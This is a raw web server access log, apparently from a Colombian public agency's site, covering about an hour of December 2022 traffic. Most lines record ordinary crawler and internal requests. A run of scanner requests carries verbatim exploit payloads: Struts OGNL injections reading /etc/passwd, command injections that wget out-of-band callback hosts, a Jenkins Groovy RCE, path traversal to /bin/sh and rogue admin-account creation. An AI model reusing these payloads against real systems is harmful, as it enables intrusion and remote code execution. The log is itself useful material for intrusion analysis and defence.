114.119.146.241 - - [21/Dec/2022:03:41:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20501%20AL%20600/RESOLUCION%200595%20DE%202007.pdf HTTP/1.1" 200 535933
213.180.203.83 - - [21/Dec/2022:03:42:27 -0500] "-" 408 -
173.255.236.28 - - [21/Dec/2022:03:42:40 -0500] "HEAD / HTTP/1.1" 200 -
66.175.211.51 - - [21/Dec/2022:03:42:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Dec/2022:03:43:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
87.250.224.70 - - [21/Dec/2022:03:43:27 -0500] "-" 408 -
114.119.136.86 - - [21/Dec/2022:03:43:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7222.pdf HTTP/1.1" 200 452175
216.245.221.92 - - [21/Dec/2022:03:44:19 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:03:42:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.157.190 - - [21/Dec/2022:03:44:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1060.pdf HTTP/1.1" 200 209776
172.22.2.4 - - [21/Dec/2022:03:43:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51248
213.180.203.83 - - [21/Dec/2022:03:45:27 -0500] "-" 408 -
114.119.147.239 - - [21/Dec/2022:03:45:41 -0500] "GET /BLA/resoluciones/AUTOS%202018/0040.pdf HTTP/1.1" 200 310837
114.119.149.157 - - [21/Dec/2022:03:47:38 -0500] "GET /BLA/resoluciones/AUTOS%202016/0040.pdf HTTP/1.1" 200 482685
201.245.192.253 - - [21/Dec/2022:03:48:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
87.250.224.20 - - [21/Dec/2022:03:48:27 -0500] "-" 408 -
186.102.63.238 - - [21/Dec/2022:03:48:41 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
114.119.136.76 - - [21/Dec/2022:03:48:42 -0500] "GET /BLA/resoluciones/AUTOS%202015/0173.pdf HTTP/1.1" 200 560855
186.102.63.238 - - [21/Dec/2022:03:48:41 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 204 -
172.22.2.4 - - [21/Dec/2022:03:48:50 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:03:48:50 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17573
172.22.2.4 - - [21/Dec/2022:03:49:04 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
216.245.221.92 - - [21/Dec/2022:03:49:19 -0500] "HEAD / HTTP/1.1" 200 -
35.233.62.116 - - [21/Dec/2022:03:50:13 -0500] "GET / HTTP/1.1" 200 319
114.119.144.233 - - [21/Dec/2022:03:50:13 -0500] "GET /BLA/resoluciones/AUTOS%202014/2236.pdf HTTP/1.1" 200 2709075
172.22.2.4 - - [21/Dec/2022:03:48:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:03:49:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48801
114.119.143.59 - - [21/Dec/2022:03:51:48 -0500] "GET /BLA/resoluciones/AUTOS%202012/0478.pdf HTTP/1.1" 200 513192
114.119.146.241 - - [21/Dec/2022:03:53:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2641.pdf HTTP/1.1" 200 339502
201.245.192.253 - - [21/Dec/2022:03:53:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
5.45.207.143 - - [21/Dec/2022:03:53:27 -0500] "-" 408 -
114.119.138.82 - - [21/Dec/2022:03:54:04 -0500] "GET /BLA/resoluciones/AUTOS%202010/6069.pdf HTTP/1.1" 200 4146282
216.245.221.92 - - [21/Dec/2022:03:54:19 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:03:52:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:03:54:53 -0500] "GET /BLA/boletinlegal/js/ajax_conceptos.js HTTP/1.1" 200 1326
172.22.2.4 - - [21/Dec/2022:03:55:02 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [21/Dec/2022:03:55:02 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
114.119.145.100 - - [21/Dec/2022:03:55:11 -0500] "GET /BLA/resoluciones/AUTOS%202007/3510.pdf HTTP/1.1" 200 240803
172.22.2.4 - - [21/Dec/2022:03:54:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:03:55:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51248
114.119.136.138 - - [21/Dec/2022:03:57:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5017.pdf HTTP/1.1" 200 751683
80.94.92.57 - - [21/Dec/2022:03:57:12 -0500] "GET / HTTP/1.1" 200 319
114.119.147.239 - - [21/Dec/2022:03:58:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2468.pdf HTTP/1.1" 200 496446
114.119.141.9 - - [21/Dec/2022:03:57:26 -0500] "GET /portaldeninos/wp-content/uploads/2022/08/HUmedalConejera03-1.jpg HTTP/1.1" 200 12388495
201.245.192.253 - - [21/Dec/2022:03:58:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
216.245.221.92 - - [21/Dec/2022:03:59:19 -0500] "HEAD / HTTP/1.1" 200 -
114.119.145.126 - - [21/Dec/2022:04:00:28 -0500] "GET /Autoliquidacion/index.php?dir=TR%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%AF%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%BF%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%BDMITES%2BAGUAS%2BSUPERFICIALES/&sort=name&order=asc HTTP/1.1" 200 7441
87.250.224.142 - - [21/Dec/2022:04:01:27 -0500] "-" 408 -
186.102.63.238 - - [21/Dec/2022:04:01:31 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.63.238 - - [21/Dec/2022:04:01:31 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 204 -
172.22.2.4 - - [21/Dec/2022:04:00:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.194 - - [21/Dec/2022:04:02:16 -0500] "GET /bla/resoluciones/notificaciones/autos%202018/01408.pdf HTTP/1.1" 304 -
172.22.2.4 - - [21/Dec/2022:04:01:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56825
201.245.192.253 - - [21/Dec/2022:04:03:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
114.119.135.202 - - [21/Dec/2022:04:04:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7097.pdf HTTP/1.1" 200 284211
114.119.150.85 - - [21/Dec/2022:04:05:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2590.pdf HTTP/1.1" 200 469400
201.245.192.253 - - [21/Dec/2022:04:08:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
216.245.221.92 - - [21/Dec/2022:04:08:41 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:04:09:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
5.255.253.113 - - [21/Dec/2022:04:11:27 -0500] "-" 408 -
172.22.2.4 - - [21/Dec/2022:04:10:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51643
201.245.192.253 - - [21/Dec/2022:04:13:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
216.245.221.92 - - [21/Dec/2022:04:13:40 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:04:14:35 -0500] "GET /BLA/boletinlegal/autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 1018
124.156.223.97 - - [21/Dec/2022:04:14:51 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [21/Dec/2022:04:15:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:04:15:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54452
201.245.192.253 - - [21/Dec/2022:04:18:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
216.245.221.92 - - [21/Dec/2022:04:18:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Dec/2022:04:20:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42774
201.245.192.253 - - [21/Dec/2022:04:20:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40598
5.45.207.120 - - [21/Dec/2022:04:21:27 -0500] "-" 408 -
186.102.63.238 - - [21/Dec/2022:04:22:28 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.63.238 - - [21/Dec/2022:04:22:28 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 204 -
172.22.2.4 - - [21/Dec/2022:04:20:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [21/Dec/2022:04:23:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
172.22.2.4 - - [21/Dec/2022:04:21:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51643
216.245.221.92 - - [21/Dec/2022:04:23:40 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:04:23:57 -0500] "GET /BLA/boletinlegal/documentos-importantes.php HTTP/1.1" 200 4829
172.22.2.4 - - [21/Dec/2022:04:27:22 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%207%20del%2023%20de%20Diciembre%20de%202011.pdf HTTP/1.1" 304 -
201.245.192.253 - - [21/Dec/2022:04:28:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
172.22.2.4 - - [21/Dec/2022:04:26:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
96.126.105.142 - - [21/Dec/2022:04:28:37 -0500] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 404 1035
96.126.105.142 - - [21/Dec/2022:04:28:37 -0500] "POST /index.php?s=/home/page/uploadImg HTTP/1.1" 404 1035
96.126.105.142 - - [21/Dec/2022:04:28:38 -0500] "POST /cgi/networkDiag.cgi HTTP/1.1" 404 1035
96.126.105.142 - - [21/Dec/2022:04:28:38 -0500] "POST /api/timelion/run HTTP/1.1" 404 1035
96.126.105.142 - - [21/Dec/2022:04:28:38 -0500] "GET /graph_realtime.php?action=init HTTP/1.1" 404 1035
96.126.105.142 - - [21/Dec/2022:04:28:38 -0500] "GET /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B HTTP/1.1" 404 1035
96.126.105.142 - - [21/Dec/2022:04:28:38 -0500] "GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1" 404 1035
96.126.105.142 - - [21/Dec/2022:04:28:39 -0500] "GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E HTTP/1.1" 404 1035
96.126.105.142 - - [21/Dec/2022:04:28:39 -0500] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 200 319
96.126.105.142 - - [21/Dec/2022:04:28:40 -0500] "POST /password_change.cgi HTTP/1.1" 404 1199
96.126.105.142 - - [21/Dec/2022:04:28:40 -0500] "POST / HTTP/1.1" 200 319
216.245.221.92 - - [21/Dec/2022:04:28:41 -0500] "HEAD / HTTP/1.1" 200 -
96.126.105.142 - - [21/Dec/2022:04:28:42 -0500] "POST /index.php HTTP/1.1" 404 1035
96.126.105.142 - - [21/Dec/2022:04:28:43 -0500] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 403 1023
96.126.105.142 - - [21/Dec/2022:04:28:43 -0500] "GET /search.php?search=%22;wget+http%3A%2F%2Fcehd0jsl986cc4000010rpi1gugod51qi.oast.fun%27;%22 HTTP/1.1" 404 1035
172.22.2.4 - - [21/Dec/2022:04:27:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52942
157.55.39.172 - - [21/Dec/2022:04:30:25 -0500] "GET /Publicaciones/2022EE245748.pdf HTTP/1.1" 404 228
201.245.192.253 - - [21/Dec/2022:04:30:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42774
201.245.192.253 - - [21/Dec/2022:04:30:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40598
114.119.143.59 - - [21/Dec/2022:04:31:14 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/PARTE%20C/Dise%C3%B1o%20de%20Elementos%20MEA40.pdf HTTP/1.1" 200 491163
96.126.105.142 - - [21/Dec/2022:04:31:16 -0500] "GET /?p=1 HTTP/1.1" 200 319
96.126.105.142 - - [21/Dec/2022:04:31:18 -0500] "GET /qvisdvr/ HTTP/1.1" 404 1035
5.255.253.152 - - [21/Dec/2022:04:31:27 -0500] "-" 408 -
114.119.134.89 - - [21/Dec/2022:04:31:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0065.pdf HTTP/1.1" 200 648506
162.55.170.174 - - [21/Dec/2022:04:32:23 -0500] "GET / HTTP/1.1" 200 319
96.126.105.142 - - [21/Dec/2022:04:32:42 -0500] "GET /pfblockerng/www/index.php HTTP/1.1" 404 1035
96.126.105.142 - - [21/Dec/2022:04:32:46 -0500] "GET /pfblockerng/www/index.php HTTP/1.1" 404 1059
96.126.105.142 - - [21/Dec/2022:04:32:59 -0500] "POST /v1/backend1 HTTP/1.1" 404 1035
96.126.105.142 - - [21/Dec/2022:04:33:00 -0500] "POST /seeyon/htmlofficeservlet HTTP/1.1" 404 1035
96.126.105.142 - - [21/Dec/2022:04:33:03 -0500] "GET /v1/2JDZJhWOUxr3tYEqdebVJu2h62A.php HTTP/1.1" 404 1035
96.126.105.142 - - [21/Dec/2022:04:33:03 -0500] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 404 1035
96.126.105.142 - - [21/Dec/2022:04:33:04 -0500] "GET /seeyon/test123456.jsp?pwd=asasd3344&2JDZJg0nTtbI73H02uYzSAu2rGc=ipconfig HTTP/1.1" 404 1035
96.126.105.142 - - [21/Dec/2022:04:33:06 -0500] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2JDZJcwL1BVy4a7qWUeL3S2kqmX.jsp HTTP/1.1" 404 1035
201.245.192.253 - - [21/Dec/2022:04:33:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
216.245.221.92 - - [21/Dec/2022:04:33:40 -0500] "HEAD / HTTP/1.1" 200 -
114.119.148.88 - - [21/Dec/2022:04:33:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0407.pdf HTTP/1.1" 200 524537
207.46.13.198 - - [21/Dec/2022:04:34:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/2001%20600-649.TIF HTTP/1.1" 200 9885868
172.22.2.4 - - [21/Dec/2022:04:32:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:04:34:35 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [21/Dec/2022:04:33:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50495
114.119.156.31 - - [21/Dec/2022:04:35:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%203201%20AL%203300/RESOLUCION%20322_%20DE%202007.pdf HTTP/1.1" 200 2014639
96.126.105.142 - - [21/Dec/2022:04:37:27 -0500] "POST / HTTP/1.1" 200 319
96.126.105.142 - - [21/Dec/2022:04:37:30 -0500] "POST / HTTP/1.1" 200 319
96.126.105.142 - - [21/Dec/2022:04:37:34 -0500] "POST / HTTP/1.1" 200 319
23.92.21.31 - - [21/Dec/2022:04:38:16 -0500] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 1049
23.92.21.31 - - [21/Dec/2022:04:38:16 -0500] "GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1" 404 1175
23.92.21.31 - - [21/Dec/2022:04:38:16 -0500] "POST /node/1?_format=hal_json HTTP/1.1" 404 1049
23.92.21.31 - - [21/Dec/2022:04:38:16 -0500] "GET / HTTP/1.1" 200 319
23.92.21.31 - - [21/Dec/2022:04:38:16 -0500] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 404 1049
23.92.21.31 - - [21/Dec/2022:04:38:16 -0500] "GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1" 200 319
201.245.192.253 - - [21/Dec/2022:04:38:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
23.92.21.31 - - [21/Dec/2022:04:38:17 -0500] "POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 1049
23.92.21.31 - - [21/Dec/2022:04:38:17 -0500] "POST /login HTTP/1.1" 404 1275
23.92.21.31 - - [21/Dec/2022:04:38:17 -0500] "POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1" 404 1049
23.92.21.31 - - [21/Dec/2022:04:38:19 -0500] "GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1" 404 1049
23.92.21.31 - - [21/Dec/2022:04:38:33 -0500] "GET /?action=command&command=set_city_timezone&value=$(wget%20http://cehd0k4l986cc7g00010comc1grb65prj.oast.pro)) HTTP/1.1" 200 319
23.92.21.31 - - [21/Dec/2022:04:38:35 -0500] "POST /upload HTTP/1.1" 404 1049
23.92.21.31 - - [21/Dec/2022:04:38:36 -0500] "POST /boaform/admin/formTracert HTTP/1.1" 404 1287
216.245.221.92 - - [21/Dec/2022:04:38:40 -0500] "HEAD / HTTP/1.1" 200 -
23.92.21.31 - - [21/Dec/2022:04:38:41 -0500] "GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://cehd0k4l986cc7g00010yf5xcxfunz8yf.oast.pro;%27 HTTP/1.1" 404 1049
23.92.21.31 - - [21/Dec/2022:04:38:42 -0500] "POST / HTTP/1.1" 200 319
23.92.21.31 - - [21/Dec/2022:04:38:43 -0500] "POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1" 404 1049
23.92.21.31 - - [21/Dec/2022:04:38:43 -0500] "GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cehd0k4l986cc7g0001061sxbehgcwynd.oast.pro') HTTP/1.1" 404 1049
23.92.21.31 - - [21/Dec/2022:04:38:46 -0500] "POST /sysShell HTTP/1.1" 404 1049
172.22.2.4 - - [21/Dec/2022:04:38:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
45.79.136.154 - - [21/Dec/2022:04:40:15 -0500] "GET /oam/server/opensso/sessionservice HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:04:40:15 -0500] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:04:40:16 -0500] "GET /graph_realtime.php?action=init HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:04:40:16 -0500] "POST /cgi-bin/login.cgi HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:04:40:16 -0500] "OPTIONS / HTTP/1.1" 200 -
45.79.136.154 - - [21/Dec/2022:04:40:16 -0500] "POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:04:40:16 -0500] "GET /ReportServer/Pages/ReportViewer.aspx HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:04:40:16 -0500] "GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:04:40:16 -0500] "POST /jars/upload HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:04:40:16 -0500] "POST /storfs-asup HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:04:40:16 -0500] "POST /service/extdirect HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:04:40:17 -0500] "GET /chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:04:40:18 -0500] "POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:04:40:19 -0500] "POST / HTTP/1.1" 200 319
45.79.136.154 - - [21/Dec/2022:04:40:19 -0500] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 404 1146
45.79.136.154 - - [21/Dec/2022:04:40:21 -0500] "POST /user.action HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:04:40:21 -0500] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 1022
201.245.192.253 - - [21/Dec/2022:04:40:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42774
201.245.192.253 - - [21/Dec/2022:04:40:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40598
172.22.2.4 - - [21/Dec/2022:04:39:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
5.255.253.120 - - [21/Dec/2022:04:41:28 -0500] "-" 408 -
172.104.27.41 - - [21/Dec/2022:04:41:58 -0500] "POST /scripts/setup.php HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:04:41:58 -0500] "GET /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:04:41:59 -0500] "POST /boaform/admin/formTracert HTTP/1.1" 404 1242
172.104.27.41 - - [21/Dec/2022:04:41:59 -0500] "GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=5Z0tjk&adminpassword=hyNCZV&adminemail=test@test.com&adminname=test HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:04:41:59 -0500] "POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:04:41:59 -0500] "GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://cehd0kcl986cc5g000101pqi6ok8z6axn.oast.fun; HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:04:41:59 -0500] "PUT /v1/agent/service/register HTTP/1.1" 405 954
172.104.27.41 - - [21/Dec/2022:04:41:59 -0500] "GET /index.php?plot=;wget%20http://cehd0kcl986cc5g000105mc8nd1s8ikk8.oast.fun HTTP/1.1" 200 4720
172.104.27.41 - - [21/Dec/2022:04:41:59 -0500] "GET /?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 4720
172.104.27.41 - - [21/Dec/2022:04:41:59 -0500] "POST / HTTP/1.1" 200 4720
172.104.27.41 - - [21/Dec/2022:04:42:02 -0500] "GET /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:04:42:06 -0500] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 200 4720
172.104.27.41 - - [21/Dec/2022:04:42:15 -0500] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 404 1034
201.245.192.253 - - [21/Dec/2022:04:43:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
216.245.221.92 - - [21/Dec/2022:04:43:40 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.152 - - [21/Dec/2022:04:44:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%2050-99.tif HTTP/1.1" 200 4413665
114.119.143.226 - - [21/Dec/2022:04:45:30 -0500] "GET /BLA/resoluciones/AUTOS%202015/4297.pdf HTTP/1.1" 200 549721
185.119.81.98 - - [21/Dec/2022:04:45:30 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.98 - - [21/Dec/2022:04:45:31 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
66.249.64.17 - - [21/Dec/2022:04:45:52 -0500] "-" 408 -
